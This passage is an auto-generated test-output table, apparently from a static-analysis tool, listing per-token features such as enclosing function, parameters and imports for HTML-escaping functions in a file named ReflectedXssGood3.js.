autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:14:47:14 | s | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:14:47:14 | s | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:14:47:14 | s | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:14:47:21 | s.length | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:14:47:21 | s.length | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:14:47:21 | s.length | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:14:47:21 | s.length | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:14:47:21 | s.length | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:16:47:21 | length | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:16:47:21 | length | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:16:47:21 | length | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:16:47:21 | length | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:16:47:21 | length | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:10 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:10 | ch | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:10 | ch | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:10 | ch | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:10 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:19 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:19 | ch | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:19 | ch | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:19 | ch | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:19 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:19 | ch = s[i++] | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:19 | ch = s[i++] | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:19 | ch = s[i++] | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:19 | ch = s[i++] | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:9:48:19 | ch = s[i++] | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:14:48:14 | s | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:14:48:14 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:14:48:14 | s | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:14:48:14 | s | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:14:48:14 | s | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:14:48:19 | s[i++] | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:14:48:19 | s[i++] | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:14:48:19 | s[i++] | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:14:48:19 | s[i++] | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:14:48:19 | s[i++] | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:16:48:16 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:16:48:16 | i | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:16:48:16 | i | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:16:48:16 | i | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:16:48:16 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:16:48:18 | i++ | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:16:48:18 | i++ | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:16:48:18 | i++ | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:16:48:18 | i++ | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:48:16:48:18 | i++ | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:49:13:49:14 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:49:13:49:14 | ch | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:49:13:49:14 | ch | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:49:13:49:14 | ch | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:49:13:49:14 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:50:12:50:14 | '&' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:50:12:50:14 | '&' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:50:12:50:14 | '&' | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:50:12:50:14 | '&' | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:50:12:50:14 | '&' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:11 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:11 | buf | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:11 | buf | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:11 | buf | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:11 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:11 | buf | stringConcatenatedWith | -endpoint- '&' | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:22 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:22 | buf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:22 | buf | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:22 | buf | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:22 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:22 | buf += '&' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:22 | buf += '&' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:22 | buf += '&' | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:22 | buf += '&' | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:9:51:22 | buf += '&' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:16:51:22 | '&' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:16:51:22 | '&' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:16:51:22 | '&' | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:16:51:22 | '&' | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:16:51:22 | '&' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:51:16:51:22 | '&' | stringConcatenatedWith | '' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:53:12:53:14 | '<' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:53:12:53:14 | '<' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:53:12:53:14 | '<' | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:53:12:53:14 | '<' | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:53:12:53:14 | '<' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:11 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:11 | buf | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:11 | buf | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:11 | buf | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:11 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:11 | buf | stringConcatenatedWith | -endpoint- '<' | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:21 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:21 | buf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:21 | buf | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:21 | buf | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:21 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:21 | buf += '<' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:21 | buf += '<' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:21 | buf += '<' | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:21 | buf += '<' | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:9:54:21 | buf += '<' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:16:54:21 | '<' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:16:54:21 | '<' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:16:54:21 | '<' | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:16:54:21 | '<' | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:16:54:21 | '<' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:54:16:54:21 | '<' | stringConcatenatedWith | '' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:56:12:56:15 | '\\"' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:56:12:56:15 | '\\"' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:56:12:56:15 | '\\"' | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:56:12:56:15 | '\\"' | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:56:12:56:15 | '\\"' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:11 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:11 | buf | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:11 | buf | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:11 | buf | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:11 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:11 | buf | stringConcatenatedWith | -endpoint- '"' | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:23 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:23 | buf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:23 | buf | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:23 | buf | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:23 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:23 | buf += '"' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:23 | buf += '"' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:23 | buf += '"' | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:23 | buf += '"' | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:9:57:23 | buf += '"' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:16:57:23 | '"' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:16:57:23 | '"' | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:16:57:23 | '"' | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:16:57:23 | '"' | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:16:57:23 | '"' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:57:16:57:23 | '"' | stringConcatenatedWith | '' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:11 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:11 | buf | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:11 | buf | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:11 | buf | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:11 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:11 | buf | stringConcatenatedWith | -endpoint- ch | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:17 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:17 | buf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:17 | buf | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:17 | buf | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:17 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:17 | buf += ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:17 | buf += ch | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:17 | buf += ch | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:17 | buf += ch | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:9:60:17 | buf += ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:16:60:17 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:16:60:17 | ch | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:16:60:17 | ch | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:16:60:17 | ch | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:16:60:17 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:60:16:60:17 | ch | stringConcatenatedWith | '' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:64:10:64:12 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:64:10:64:12 | buf | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:64:10:64:12 | buf | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:64:10:64:12 | buf | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:64:10:64:12 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:68:0 | this | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:68:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:68:0 | this | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:68:0 | this | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:68:0 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | 'arguments' object of function escapeHtml3 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | 'arguments' object of function escapeHtml3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | 'arguments' object of function escapeHtml3 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | 'arguments' object of function escapeHtml3 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | 'arguments' object of function escapeHtml3 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | exceptional return of function escapeHtml3 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | exceptional return of function escapeHtml3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | exceptional return of function escapeHtml3 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | exceptional return of function escapeHtml3 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | exceptional return of function escapeHtml3 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | functio ... ('');\\n} | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | functio ... ('');\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | functio ... ('');\\n} | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | return of function escapeHtml3 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | return of function escapeHtml3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | return of function escapeHtml3 | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | return of function escapeHtml3 | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:1:109:1 | return of function escapeHtml3 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:10:68:20 | escapeHtml3 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:10:68:20 | escapeHtml3 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:10:68:20 | escapeHtml3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:10:68:20 | escapeHtml3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:10:68:20 | escapeHtml3 | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:10:68:20 | escapeHtml3 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:10:68:20 | escapeHtml3 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:68:22:68:26 | value | 